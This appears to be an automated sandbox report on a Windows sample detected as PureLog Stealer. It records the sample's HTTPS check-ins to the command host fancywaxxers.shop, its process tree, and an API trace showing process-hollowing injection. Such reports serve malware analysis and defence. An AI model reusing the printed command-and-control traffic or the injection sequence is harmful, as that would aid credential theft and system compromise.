2025-01-05 18:09:05 UTC	15331	OUT	Data Raw: 52 a6 e4 13 c7 b2 3b 30 2d d9 88 34 8d 72 c9 1c c3 b1 9d 66 31 df fe 25 b6 6f 7c 15 23 46 37 9c 54 63 24 f2 e5 cd c6 ef 21 8a a0 2d 8d d2 b7 30 95 fb 94 f1 88 85 16 09 ed 91 6c ab b1 1f 31 2e e7 9b 12 34 a9 8d 9f 7b ec 69 53 7f fa 3c 69 60 ad 3d ba f4 c8 48 4d a6 72 7e 72 dd 36 1d da 3f f5 f1 01 1b be 22 10 ad 3a 0d 4d 49 da f8 b2 92 57 7c 44 80 fa 4d 22 41 2f 42 75 95 59 4d b1 80 df 16 96 82 00 8d bf 82 72 7c b6 51 0f a9 9d e0 b5 35 a3 6d 6b b0 1f b4 fa 04 d0 e8 ab 43 1d a9 55 80 9f 77 31 7b c3 3b 73 2e 0f 3e f2 13 b6 55 ab 77 d8 62 ca 76 4d 58 19 c5 92 13 37 1a 56 de a0 8d 0d 82 7e 3d 39 b7 7c f4 d9 9f 14 37 2d 03 1b 25 f2 dc 4f 24 bd 10 fc a3 90 48 f8 b9 d4 83 fa 6f 97 55 85 1a 9a 31 71 35 e9 ff 1d cd ff 9b 36 27 f4 68 c2 17 f5 c7 fe ec 51 7c ca 82 8e Data Ascii: R;0-4rf1%o\|#F7Tc$!-0l1.4{iS<i`=HMr~r6?":MIW\|DM"A/BuYMr\|Q5mkCUw1{;s.>UwbvMX7V~=9\|7-%O$HoU1q56'hQ\|
2025-01-05 18:09:05 UTC	15331	OUT	Data Raw: 5e 0d 64 fa 10 ed e5 b6 63 12 0b eb 55 30 f0 cb 87 f5 67 77 c6 44 3c 1b f7 51 ea bd a1 9c 19 a2 e6 14 95 05 a8 cf 55 c5 bc 4c 68 5f b9 94 88 14 31 d0 1a 20 c0 3d 06 8a 55 15 bd 9c 23 09 44 7e 10 72 89 c8 16 04 c7 71 c8 7c da 21 e5 16 82 47 f8 02 ea 35 48 65 6a 4c f0 89 03 ab 1d ba b1 d1 a2 d7 50 29 1c cf f3 3d 88 7e 18 c6 b7 c6 1f 13 69 c3 bd 86 11 bc 7f 4a fa d8 3d bf 48 fa 46 3d 94 1e f5 2e 5e 80 a8 c9 a8 53 8e 24 8d 82 40 14 88 3f 24 af 2b 21 74 d5 22 25 ec 31 b4 ce d5 ce a1 c1 31 f1 e2 4f 8e ba 02 ea 83 4d 1b 71 7a 30 7d 4c 21 b3 0c 23 e2 6e a4 c1 c9 f9 89 d0 4c 7d 14 3f af 87 88 e0 a7 3d e8 e2 07 55 bc 0f c3 75 2a b8 9c f6 35 e5 be af 0f 53 f6 cc 2b 80 30 10 69 20 7f 39 12 be 12 1b 99 88 1a 51 a4 92 1f 35 f4 a4 18 e9 9e 23 d3 4f 88 43 64 05 58 a6 e2 Data Ascii: ^dcU0gwD<QULh_1 =U#D~rq\|!G5HejLP)=~iJ=HF=.^S$@?$+!t"%11OMqz0}L!#nL}?=Uu*5S+0i 9Q5#OCdX
2025-01-05 18:09:06 UTC	1140	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:09:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h4hce5719bgfgc9d9g29dngieo; expires=Thu, 01 May 2025 11:55:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AB4%2FBKssSXbY95F8ETa2TIUkEeoI4L%2BNGkLryoszx68Tj1ukEQZ8dSUF7at1TbCEGM25VnGEw%2FgZrdz15zay1G3Pk%2BT5aN2Iil6Ag2OqWCaQCK2fy41rZJ48IUCaL9xU1kKjJQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd56ad6aca57d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2665&min_rtt=2049&rtt_var=1209&sent=197&recv=588&lost=0&retrans=0&sent_bytes=2843&recv_bytes=571451&delivery_rate=1425085&cwnd=244&unsent_bytes=0&cid=2790417453f2f8c6&ts=1618&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49724	104.21.80.1	443	1480	C:\Users\user\Desktop\Script.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:09:07 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: fancywaxxers.shop
2025-01-05 18:09:07 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 33 33 31 38 30 31 32 39 38 26 6a 3d 26 68 77 69 64 3d 32 43 36 33 45 45 38 39 46 39 41 30 33 41 33 36 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31 Data Ascii: act=get_message&ver=4.0&lid=yau6Na--6331801298&j=&hwid=2C63EE89F9A03A3633642DA608956FF1
2025-01-05 18:09:07 UTC	1125	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:09:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pn1hg9ljhkofruef5gr1o1425g; expires=Thu, 01 May 2025 11:55:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ns6FNWjHjEVKq1i9foQv0caVPxaENK9FYeJbP90%2F0ac5AAQKd0CrmB6cpMRGXQRFc8ADVblRlND5WCUFxgn6Np7NtaArs8n0nC9Ru5IpSrwUbeDEiZrqQ3BocZw3uCSEVQEp7A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd56ae3fb5143ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1765&min_rtt=1763&rtt_var=665&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=988&delivery_rate=1639528&cwnd=230&unsent_bytes=0&cid=42dad5ce7812c1b2&ts=736&x=0"
2025-01-05 18:09:07 UTC	244	IN	Data Raw: 33 37 30 30 0d 0a 59 41 55 35 47 44 64 51 53 72 4f 57 54 4c 63 2f 6c 4f 62 74 4b 66 4e 65 6c 5a 65 46 48 74 72 67 33 6e 50 49 5a 6b 75 75 39 58 51 37 66 68 74 2b 51 33 4a 77 67 72 70 75 30 68 32 75 31 38 45 4c 6c 33 79 76 74 63 31 38 67 34 50 76 47 61 6b 49 41 4e 75 59 47 46 52 73 63 46 51 43 48 51 58 47 30 6e 76 7a 57 2f 2b 36 77 6c 36 35 4c 39 54 78 74 57 71 7a 30 4c 4a 42 71 69 55 5a 2b 72 77 63 4d 54 4a 2b 54 47 41 65 66 4e 44 6e 65 74 5a 33 2f 61 2b 4b 58 35 67 70 6f 36 50 56 62 5a 54 53 69 69 2f 6e 4a 79 62 42 74 79 68 50 55 51 74 55 5a 41 67 51 77 4e 77 4b 2b 6c 62 57 31 4e 39 68 76 51 65 6e 35 2f 78 73 71 70 43 37 4f 71 45 6c 59 50 71 78 42 67 63 75 54 69 74 74 41 48 4c 77 39 79 76 2f 42 74 69 2f 6d 57 4f 58 4d 4e Data Ascii: 3700YAU5GDdQSrOWTLc/lObtKfNelZeFHtrg3nPIZkuu9XQ7fht+Q3Jwgrpu0h2u18ELl3yvtc18g4PvGakIANuYGFRscFQCHQXG0nvzW/+6wl65L9TxtWqz0LJBqiUZ+rwcMTJ+TGAefNDnetZ3/a+KX5gpo6PVbZTSii/nJybBtyhPUQtUZAgQwNwK+lbW1N9hvQen5/xsqpC7OqElYPqxBgcuTittAHLw9yv/Bti/mWOXMN
2025-01-05 18:09:07 UTC	1369	IN	Data Raw: 7a 38 30 47 65 54 70 65 67 65 70 56 51 50 39 36 45 39 47 56 5a 38 54 31 34 65 41 76 6a 7a 41 49 46 6c 72 59 75 59 57 73 63 6d 6f 75 2b 33 58 5a 33 52 37 6a 4b 4f 45 7a 2f 6d 71 56 73 70 63 46 31 6f 57 7a 35 38 79 64 41 34 34 56 6e 38 30 72 70 6c 70 78 33 67 38 4f 39 4f 36 70 62 74 45 59 52 56 4a 76 32 51 4f 53 4a 5a 46 6b 78 61 4d 51 6e 72 7a 42 43 59 64 64 61 76 68 47 71 64 4f 2f 48 62 77 43 79 71 6d 61 77 44 75 41 4d 43 78 37 59 44 4e 45 46 4c 57 77 46 6e 65 66 6d 6c 64 50 52 64 38 36 37 55 5a 61 6f 77 33 2f 50 6f 61 62 47 31 70 7a 71 41 42 78 4c 4e 78 42 34 42 4e 6e 4a 74 57 6a 78 2b 32 74 38 41 67 6e 4c 62 6b 36 55 65 74 78 44 2b 79 36 70 70 6b 4a 47 35 46 66 67 56 43 4a 36 5a 52 67 4a 47 61 30 78 2b 4e 79 6a 48 2f 6a 62 67 63 65 57 46 6e 42 2b 53 43 Data Ascii: z80GeTpegepVQP96E9GVZ8T14eAvjzAIFlrYuYWscmou+3XZ3R7jKOEz/mqVspcF1oWz58ydA44Vn80rplpx3g8O9O6pbtEYRVJv2QOSJZFkxaMQnrzBCYddavhGqdO/HbwCyqmawDuAMCx7YDNEFLWwFnefmldPRd867UZaow3/PoabG1pzqABxLNxB4BNnJtWjx+2t8AgnLbk6UetxD+y6ppkJG5FfgVCJ6ZRgJGa0x+NyjH/jbgceWFnB+SC
2025-01-05 18:09:07 UTC	1369	IN	Data Raw: 4b 6e 70 4b 35 57 4c 39 56 45 66 37 4e 4e 77 46 69 63 53 46 37 43 54 37 35 38 69 48 41 56 4d 47 66 70 47 47 52 42 2f 61 6d 37 33 2b 30 71 36 73 65 70 46 49 69 35 37 6c 42 4c 55 70 4d 58 41 41 55 4c 74 6a 4b 59 38 42 31 35 61 65 4c 47 59 63 33 70 66 75 33 66 4a 6d 79 69 6a 71 76 41 6a 2f 47 6a 79 4d 75 64 46 70 70 41 54 45 53 32 74 38 72 77 56 54 6a 30 4e 6c 35 67 42 43 6e 77 39 6b 78 6d 34 32 78 4d 5a 52 4a 47 4a 79 35 4a 7a 68 66 53 6c 4a 78 48 53 50 78 70 48 37 2f 63 63 33 55 6e 56 43 42 4c 75 58 79 7a 48 65 5a 79 34 6f 33 75 67 46 67 32 63 59 75 4d 44 31 36 65 56 41 59 63 2f 2f 50 4f 50 31 62 2b 5a 47 47 66 49 6f 58 33 66 58 63 66 65 75 4b 76 78 32 44 45 79 62 43 77 52 30 70 53 51 78 56 65 43 55 4f 68 4e 49 6f 33 47 4f 37 6b 61 64 59 73 6a 69 6c 34 2b Data Ascii: KnpK5WL9VEf7NNwFicSF7CT758iHAVMGfpGGRB/am73+0q6sepFIi57lBLUpMXAAULtjKY8B15aeLGYc3pfu3fJmyijqvAj/GjyMudFppATES2t8rwVTj0Nl5gBCnw9kxm42xMZRJGJy5JzhfSlJxHSPxpH7/cc3UnVCBLuXyzHeZy4o3ugFg2cYuMD16eVAYc//POP1b+ZGGfIoX3fXcfeuKvx2DEybCwR0pSQxVeCUOhNIo3GO7kadYsjil4+
2025-01-05 18:09:07 UTC	1369	IN	Data Raw: 6a 78 32 78 55 6a 33 66 76 6b 51 6e 64 56 78 52 58 68 49 4d 2f 76 6b 31 2f 6b 66 59 69 71 64 52 78 32 72 65 38 4d 30 6e 6e 72 69 50 45 72 6b 65 4d 65 6d 38 45 41 68 52 55 6e 5a 64 47 78 75 41 77 67 6a 43 44 2b 47 53 69 6e 43 33 4e 65 43 6c 37 57 75 4b 31 4c 51 37 75 6c 55 52 35 35 45 6d 55 31 46 51 65 30 59 48 66 74 66 6a 50 34 52 61 78 64 2f 62 5a 35 56 72 78 73 50 57 4a 75 79 51 75 54 43 55 53 52 72 4d 70 54 64 54 53 6e 55 70 5a 52 45 73 37 37 6b 50 7a 6e 7a 63 68 35 6b 5a 68 7a 48 34 34 66 78 45 6e 61 4b 49 43 36 55 4b 47 76 6e 45 4c 42 6c 42 56 46 49 63 4f 69 36 4b 31 44 6a 34 43 4b 4f 6e 32 47 32 62 48 39 44 53 73 33 75 63 6f 35 73 5a 6d 31 51 6e 33 6f 30 77 45 31 4e 62 64 6c 78 6f 44 59 48 30 48 76 30 4f 31 72 79 4d 66 70 63 6b 70 64 44 2f 61 62 61 Data Ascii: jx2xUj3fvkQndVxRXhIM/vk1/kfYiqdRx2re8M0nnriPErkeMem8EAhRUnZdGxuAwgjCD+GSinC3NeCl7WuK1LQ7ulUR55EmU1FQe0YHftfjP4Raxd/bZ5VrxsPWJuyQuTCUSRrMpTdTSnUpZREs77kPznzch5kZhzH44fxEnaKIC6UKGvnELBlBVFIcOi6K1Dj4CKOn2G2bH9DSs3uco5sZm1Qn3o0wE1NbdlxoDYH0Hv0O1ryMfpckpdD/aba
2025-01-05 18:09:07 UTC	1369	IN	Data Raw: 53 6b 62 2f 36 30 75 44 30 38 4e 55 6d 59 53 41 2f 48 61 4c 76 52 46 77 62 44 55 65 37 6f 61 2b 63 2f 63 4c 2b 6d 6d 74 42 54 6a 41 54 37 58 78 78 45 6a 56 6e 64 36 42 78 77 42 32 4d 70 6a 6a 6c 37 69 31 37 68 51 75 68 76 79 30 75 42 74 6c 71 36 77 4f 5a 39 58 4c 4a 71 4d 50 53 78 66 54 6c 39 45 4e 7a 37 62 2f 77 76 64 53 74 2b 38 6c 45 79 67 45 50 48 57 32 54 48 72 6c 70 41 44 73 6c 59 67 79 4c 70 46 45 48 56 50 4b 58 77 67 41 50 72 42 43 64 68 5a 78 4d 32 58 5a 73 41 32 70 4f 4c 58 4a 72 6d 31 72 77 4b 4c 4b 67 33 62 76 42 6b 68 54 33 70 53 55 79 4d 6a 38 71 52 35 34 47 32 67 30 36 68 72 68 67 37 63 31 64 64 47 72 4e 4b 62 4b 71 63 2f 50 63 58 45 4c 6a 41 39 55 56 64 44 5a 79 7a 56 33 77 62 37 61 4e 72 55 6a 31 75 39 62 65 58 65 76 58 33 72 69 6f 63 71 Data Ascii: Skb/60uD08NUmYSA/HaLvRFwbDUe7oa+c/cL+mmtBTjAT7XxxEjVnd6BxwB2Mpjjl7i17hQuhvy0uBtlq6wOZ9XLJqMPSxfTl9ENz7b/wvdSt+8lEygEPHW2THrlpADslYgyLpFEHVPKXwgAPrBCdhZxM2XZsA2pOLXJrm1rwKLKg3bvBkhT3pSUyMj8qR54G2g06hrhg7c1ddGrNKbKqc/PcXELjA9UVdDZyzV3wb7aNrUj1u9beXevX3riocq
2025-01-05 18:09:07 UTC	1369	IN	Data Raw: 43 68 44 53 70 32 57 6b 35 51 43 43 44 55 34 58 32 47 52 63 6a 4a 75 6d 53 65 43 65 7a 7a 72 6c 66 72 30 34 73 65 6c 45 6b 54 6d 4a 34 6c 46 69 34 4c 66 77 41 43 4a 59 76 44 4c 76 31 77 33 59 75 61 62 5a 51 73 77 4d 66 39 55 6f 50 5a 6a 30 71 70 45 48 72 37 6a 44 30 46 66 32 39 2f 61 33 38 65 34 50 67 38 67 32 7a 36 69 74 52 4d 75 68 6e 50 38 65 52 55 74 61 57 36 53 70 49 57 50 64 53 59 50 41 46 77 62 56 4e 66 59 69 6a 77 78 42 6a 2b 56 36 4f 6f 75 6d 32 69 42 2b 54 79 36 32 2b 37 68 59 5a 43 2f 41 51 6b 6d 5a 4e 42 4f 54 46 74 54 57 31 37 47 39 37 35 4a 50 4e 38 6f 6f 4f 6c 53 4b 4d 4a 31 4b 47 31 65 76 47 70 37 30 47 47 46 7a 48 30 6a 43 49 47 64 46 70 35 62 68 4d 2f 35 39 49 2b 30 48 75 6b 6f 71 39 62 6e 42 4c 30 38 38 5a 61 6e 72 7a 78 4a 62 49 74 63 Data Ascii: ChDSp2Wk5QCCDU4X2GRcjJumSeCezzrlfr04selEkTmJ4lFi4LfwACJYvDLv1w3YuabZQswMf9UoPZj0qpEHr7jD0Ff29/a38e4Pg8g2z6itRMuhnP8eRUtaW6SpIWPdSYPAFwbVNfYijwxBj+V6Ooum2iB+Ty62+7hYZC/AQkmZNBOTFtTW17G975JPN8ooOlSKMJ1KG1evGp70GGFzH0jCIGdFp5bhM/59I+0Hukoq9bnBL088ZanrzxJbItc
2025-01-05 18:09:07 UTC	1369	IN	Data Raw: 5a 55 30 6c 33 59 42 6f 66 30 4f 42 2b 38 58 4c 73 30 4a 38 51 67 7a 6e 6a 2f 50 49 6f 37 72 44 76 48 2f 30 57 4f 50 62 48 4a 79 4e 41 61 58 39 37 5a 68 50 56 35 54 72 52 64 63 4f 4c 68 58 43 66 44 4e 66 47 38 6b 75 67 71 4b 38 46 2b 67 73 49 68 61 45 77 45 6d 4a 6c 4e 32 41 49 4a 38 48 47 4b 74 56 32 33 62 65 78 42 70 51 6f 35 66 2b 75 5a 2b 50 59 73 6a 47 70 49 43 47 66 78 68 34 46 61 33 4a 33 48 43 45 57 6e 50 63 56 2b 77 72 5a 71 5a 68 74 69 57 7a 42 70 72 5a 59 67 70 47 73 51 4a 34 53 49 70 36 5a 4f 52 4a 6f 58 45 30 44 4f 53 2f 58 78 48 72 55 62 75 48 57 67 58 47 44 61 2b 50 44 35 6b 32 5a 73 5a 67 2b 6a 78 45 68 34 35 41 66 56 32 64 32 63 48 59 39 4f 65 76 38 44 74 5a 72 72 59 48 5a 57 4c 6c 72 33 38 4b 7a 54 71 36 30 6d 6a 79 59 46 7a 32 63 6d 44 Data Ascii: ZU0l3YBof0OB+8XLs0J8Qgznj/PIo7rDvH/0WOPbHJyNAaX97ZhPV5TrRdcOLhXCfDNfG8kugqK8F+gsIhaEwEmJlN2AIJ8HGKtV23bexBpQo5f+uZ+PYsjGpICGfxh4Fa3J3HCEWnPcV+wrZqZhtiWzBprZYgpGsQJ4SIp6ZORJoXE0DOS/XxHrUbuHWgXGDa+PD5k2ZsZg+jxEh45AfV2d2cHY9Oev8DtZrrYHZWLlr38KzTq60mjyYFz2cmD
2025-01-05 18:09:07 UTC	1369	IN	Data Raw: 59 6e 4d 57 45 50 37 6c 65 4e 4a 4b 33 4a 61 72 63 59 73 36 38 74 4c 58 56 2b 2b 31 71 7a 4b 38 4d 7a 6a 48 72 41 45 4f 51 6e 74 33 64 41 46 2f 68 36 41 4a 67 6d 2f 35 74 70 56 50 68 6a 44 79 77 38 34 73 6c 72 4f 49 4a 72 77 73 63 70 2b 69 4e 69 6c 79 53 53 46 75 59 6a 71 46 72 69 76 47 55 76 57 53 72 6c 79 6e 47 74 7a 75 79 6a 57 78 6f 72 64 48 68 41 51 59 35 59 77 34 56 57 78 4a 63 58 52 67 4a 4d 43 6a 49 76 39 64 7a 59 57 78 42 71 39 78 31 50 79 30 54 72 65 52 68 7a 36 52 4b 6e 37 6a 75 68 4a 52 51 58 52 7a 55 47 52 2b 67 64 38 76 68 67 62 79 68 39 70 75 75 41 72 35 33 66 41 76 6d 35 4f 34 51 4c 6b 52 48 75 4f 7a 4f 52 67 7a 53 79 46 48 4e 7a 7a 59 34 58 71 44 62 2b 4c 65 33 6e 48 4c 4f 50 7a 35 77 32 79 5a 31 65 30 34 6b 54 38 61 35 5a 77 78 50 43 70 Data Ascii: YnMWEP7leNJK3JarcYs68tLXV++1qzK8MzjHrAEOQnt3dAF/h6AJgm/5tpVPhjDyw84slrOIJrwscp+iNilySSFuYjqFrivGUvWSrlynGtzuyjWxordHhAQY5Yw4VWxJcXRgJMCjIv9dzYWxBq9x1Py0TreRhz6RKn7juhJRQXRzUGR+gd8vhgbyh9puuAr53fAvm5O4QLkRHuOzORgzSyFHNzzY4XqDb+Le3nHLOPz5w2yZ1e04kT8a5ZwxPCp
2025-01-05 18:09:07 UTC	1369	IN	Data Raw: 53 61 46 2b 42 61 63 55 63 58 53 67 32 53 2f 62 2f 62 48 34 6c 72 78 71 4c 70 47 6d 42 35 79 33 37 4d 67 55 47 31 71 4b 56 70 69 4b 66 54 45 44 66 35 58 39 70 4b 41 64 64 77 4a 7a 4b 48 6d 54 65 79 44 67 6c 79 68 49 53 7a 62 6b 67 4e 57 4d 57 6b 72 65 57 4d 6b 37 37 6b 4c 78 6c 44 61 6b 4c 6c 68 76 77 6a 42 7a 62 52 55 6e 39 43 33 4d 50 35 55 41 4d 71 73 4e 68 41 31 63 57 68 62 4a 51 44 53 31 58 6a 5a 65 2f 6d 42 78 6d 48 41 4f 2f 65 76 35 47 2b 79 6d 65 63 39 71 78 49 4e 79 70 73 6a 43 31 46 51 55 57 30 79 45 4e 69 6e 4a 2f 52 52 30 34 4f 44 65 4d 63 32 30 4e 76 76 55 34 71 75 6d 6b 71 36 41 6e 4c 2b 6a 55 41 52 51 57 55 33 42 79 6f 6a 67 73 35 2b 37 6c 62 47 72 37 52 42 6e 79 72 37 30 39 4a 4d 75 34 4f 76 43 5a 34 55 66 63 65 69 4d 69 68 53 44 6c 34 43 Data Ascii: SaF+BacUcXSg2S/b/bH4lrxqLpGmB5y37MgUG1qKVpiKfTEDf5X9pKAddwJzKHmTeyDglyhISzbkgNWMWkreWMk77kLxlDakLlhvwjBzbRUn9C3MP5UAMqsNhA1cWhbJQDS1XjZe/mBxmHAO/ev5G+ymec9qxINypsjC1FQUW0yENinJ/RR04ODeMc20NvvU4qumkq6AnL+jUARQWU3Byojgs5+7lbGr7RBnyr709JMu4OvCZ4UfceiMihSDl4C

Target ID:	0
Start time:	13:08:55
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\Script.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Script.exe"
Imagebase:	0x480000
File size:	383'016 bytes
MD5 hash:	9692FCB7996881FF1489818817D4B300
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2001576225.0000000000482000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2036187411.0000000003979000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:08:55
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:08:56
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\Script.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Script.exe"
Imagebase:	0xfd0000
File size:	383'016 bytes
MD5 hash:	9692FCB7996881FF1489818817D4B300
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	13:08:56
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 140
Imagebase:	0xa60000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	53.8%
Total number of Nodes:	13
Total number of Limit Nodes:	1

Executed Functions

Function 02977F5D Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02977ECF,02977EBF), ref: 029780F5
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02978108
Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 02978126
ReadProcessMemory.KERNELBASE(00000098,?,02977F13,00000004,00000000), ref: 0297814A
VirtualAllocEx.KERNELBASE(00000098,?,?,00003000,00000040), ref: 02978175
WriteProcessMemory.KERNELBASE(00000098,00000000,?,?,00000000,?), ref: 029781CD
WriteProcessMemory.KERNELBASE(00000098,00400000,?,?,00000000,?,00000028), ref: 02978218
WriteProcessMemory.KERNELBASE(00000098,?,?,00000004,00000000), ref: 02978256
Wow64SetThreadContext.KERNEL32(0000009C,04E30000), ref: 02978292
ResumeThread.KERNELBASE(0000009C), ref: 029782A1

Strings

aryA, xrefs: 02977FA3
CreateProcessW, xrefs: 02978011
VirtualAlloc, xrefs: 02978024
WriteProcessMemory, xrefs: 02978070
VirtualAllocEx, xrefs: 0297805D
GetP, xrefs: 02977FDF
Load, xrefs: 02977F9B
ReadProcessMemory, xrefs: 0297804A
GetThreadContext, xrefs: 02978037
TerminateProcess, xrefs: 02978184
ress, xrefs: 02977FE7
SetThreadContext, xrefs: 02978083
ResumeThread, xrefs: 02978099

Memory Dump Source

Source File: 00000000.00000002.2036146671.0000000002977000.00000040.00000800.00020000.00000000.sdmp, Offset: 02977000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2977000_Script.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-232383841
Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction ID: 9e3490e548a1970377e1521d6d69b1f27ce52d02c09f35ebb8b74c927a9ce1d7
Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction Fuzzy Hash: DCB1F77660064AAFDB60CF68CC80BDAB3A5FF88714F158524EA0CAB341D774FA51CB94

Function 029780DA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02977ECF,02977EBF), ref: 029780F5
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02978108
Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 02978126
ReadProcessMemory.KERNELBASE(00000098,?,02977F13,00000004,00000000), ref: 0297814A
VirtualAllocEx.KERNELBASE(00000098,?,?,00003000,00000040), ref: 02978175
WriteProcessMemory.KERNELBASE(00000098,00000000,?,?,00000000,?), ref: 029781CD
WriteProcessMemory.KERNELBASE(00000098,00400000,?,?,00000000,?,00000028), ref: 02978218
WriteProcessMemory.KERNELBASE(00000098,?,?,00000004,00000000), ref: 02978256
Wow64SetThreadContext.KERNEL32(0000009C,04E30000), ref: 02978292
ResumeThread.KERNELBASE(0000009C), ref: 029782A1

Strings

TerminateProcess, xrefs: 02978184

Memory Dump Source

Source File: 00000000.00000002.2036146671.0000000002977000.00000040.00000800.00020000.00000000.sdmp, Offset: 02977000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2977000_Script.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: TerminateProcess
API String ID: 2687962208-2873147277
Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction ID: 747f20cac7c1d5fdd3037e601c149bd1845871751c70f91ca011c7f0df55003a
Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction Fuzzy Hash: 7231FD72240686ABDB74CF54CC91FEA7365BFC8B15F148509FB19AF680C6B4BA018B94

Function 00F728C1 Relevance: 1.7, APIs: 1, Instructions: 219
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03973588,?,?,?,?,?,?,?,?,0048D2FB,00000000,?,00F70D9B,?,00000040), ref: 00F72B49

Memory Dump Source

Source File: 00000000.00000002.2035976393.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_Script.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18c9b75cb6a99ab7070716c62b702a666f9c5dedece0088e99b4b062101d81a4
Instruction ID: 7d0a098bd8ee4b30197e5a06a5bd271bc914197e1676c5865c85ea329b24beec
